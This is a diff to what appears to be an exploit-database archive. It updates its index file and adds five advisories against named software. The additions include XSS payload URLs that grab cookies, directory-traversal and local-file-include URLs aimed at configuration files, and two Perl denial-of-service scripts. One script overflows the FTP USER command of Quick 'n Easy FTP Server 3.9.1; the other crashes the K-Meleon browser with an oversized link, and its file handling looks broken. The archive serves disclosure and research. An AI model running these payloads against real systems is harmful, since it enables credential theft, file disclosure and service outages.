Updated 08_26_2014

files.csv

@@ -10420,7 +10420,7 @@ id,file,description,date,author,platform,type,port
 11383,platforms/php/webapps/11383.txt,"HASHE! Solutions Multiple SQL Injection Vulnerabilities",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0
 11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 - PLS PLA Exploit (WinXP SP3)",2010-02-10,"Beenu Arora",windows,local,0
 11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) XSS Vulnerability",2010-02-10,"Sioma Labs",php,webapps,0
-11391,platforms/windows/dos/11391.py,"Open and Compact FTPd Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0
+11391,platforms/windows/dos/11391.py,"Open and Compact FTPd 1.2 - Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0
 11392,platforms/windows/dos/11392.c,"Radasm 2.2.1.6 - (.rap ) Local Buffer Overflow PoC",2010-02-11,"fl0 fl0w",windows,dos,0
 11393,platforms/jsp/webapps/11393.txt,"Omnidocs SQL injection Vulnerability",2010-02-11,thebluegenius,jsp,webapps,0
 11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - XSS Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0
@@ -10446,7 +10446,7 @@ id,file,description,date,author,platform,type,port
 11414,platforms/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,asp,webapps,0
 11415,platforms/php/webapps/11415.txt,"Izumi <= 1.1.0 (RFI/LFI) Multiple Include Vulnerability",2010-02-12,"cr4wl3r ",php,webapps,0
 11416,platforms/php/webapps/11416.txt,"Alqatari Group 1.0 - Blind SQL Injection Vulnerability",2010-02-12,Red-D3v1L,php,webapps,0
-11420,platforms/windows/remote/11420.py,"Open & Compact FTPd Pre-Authentication Remote Exploit",2010-02-12,Lincoln,windows,remote,0
+11420,platforms/windows/remote/11420.py,"Open & Compact FTPd 1.2 - Pre-Authentication Remote Exploit",2010-02-12,Lincoln,windows,remote,0
 11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow Exploit (meta)",2010-02-12,Dz_attacker,windows,remote,0
 11424,platforms/php/webapps/11424.txt,"cms made simple 1.6.6 - Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0
 11425,platforms/php/webapps/11425.txt,"daChooch Remote SQL Injection Vulnerability",2010-02-12,snakespc,php,webapps,0
@@ -30985,3 +30985,8 @@ id,file,description,date,author,platform,type,port
 34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0
 34397,platforms/asp/webapps/34397.txt,"Activedition 'activedition/aelogin.asp' Multiple Cross Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0
 34399,platforms/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",ios,remote,0
+34400,platforms/php/webapps/34400.txt,"RaidenTunes 'music_out.php' Cross Site Scripting Vulnerability",2014-08-03,LiquidWorm,php,webapps,0
+34401,platforms/php/webapps/34401.txt,"PHP168 Template Editor 'filename' Parameter Directory Traversal Vulnerability",2009-10-04,esnra,php,webapps,0
+34402,platforms/php/webapps/34402.txt,"OpenSolution Quick.Cart Local File Include and Cross Site Scripting Vulnerabilities",2009-10-08,kl3ryk,php,webapps,0
+34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 USER Command Remote Buffer Overflow Vulnerability",2010-07-22,demonalex,windows,dos,0
+34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0

platforms/php/webapps/34400.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42167/info
+
+RaidenTunes is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+RaidenTunes version 2.1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/music_out.php?p=29%27%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 

platforms/php/webapps/34401.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42174/info
+
+PHP168 Template Editor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting the issue may allow an attacker to read and overwrite arbitrary files in the context of the webserver. This may aid in further attacks 
+
+http://www.example.com/background catalog/index.php?Lfj =style& job=ditcode&keywords=default& filename =../../ php168/mysql_config.php 

platforms/php/webapps/34402.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/42182/info
+
+Quick.Cart is prone to multiple local file-include vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+The following example URIs are available:
+
+http://www.example.com/nothing,important,our.file.name.html%00
+
+http://www.example.com/?p=../path.to.our.php.file-nothing-important 

platforms/windows/dos/34403.pl

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/42186/info
+
+Quick 'n Easy FTP Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input before copying it to an insufficiently sized memory buffer.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+Quick 'n Easy FTP Server 3.9.1 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl -w
+#DoS Exploit of Quick Easy Ftp Server version <=3.9.1 USER COMMAND Buffer Overflow
+#Vulnerability Discoverer & Autor : demonalex[at]163[dot]com
+use Socket;
+$host=shift;
+$port=shift || '21';
+if(!defined($host)){
+die("usage: $0 \$host [\$port]\n");
+}
+#$payload='A'x1604;
+$payload=('A'x1600)."\x3D\x41\x41\x41";         #mov     dword ptr [ebx+4], ebp
+$target_ip=inet_aton($host);
+$target=sockaddr_in($port, $target_ip);
+socket(SOCK, AF_INET, SOCK_STREAM, 6);
+connect(SOCK, $target);
+undef($content);
+recv(SOCK, $content, 100, 0);                   #get ftp banner
+send(SOCK, "USER "."$payload\r\n", 0);
+printf("send ok!\n");
+close(SOCK);
+exit(0);

platforms/windows/dos/34404.pl

@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/42200/info
+
+K-Meleon is prone to multiple denial-of-service vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to crash the application. Given the nature of these vulnerabilities, the attacker may also be able to execute arbitrary code; this has not been confirmed.
+
+#######################################################################
+#!/usr/bin/perl
+# k-meleon Long "a href" Link DoS
+# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
+# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
+# generate the file open it with k-keleon click in the link and wait a seconds
+######################################################################
+
+$archivo = $ARGV[0];
+if(!defined($archivo))
+{
+
+print "Usage: $0 <archivo.html>\n";
+
+}
+
+$cabecera = "<html>" . "\n";
+$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x
+1028135 . "\">click here if you can :)</a>" . "\n";
+$fin = "</html>";
+
+$datos = $cabecera . $payload . $fin;
+
+open(FILE, '<' . $archivo);
+print FILE $datos;
+close(FILE);
+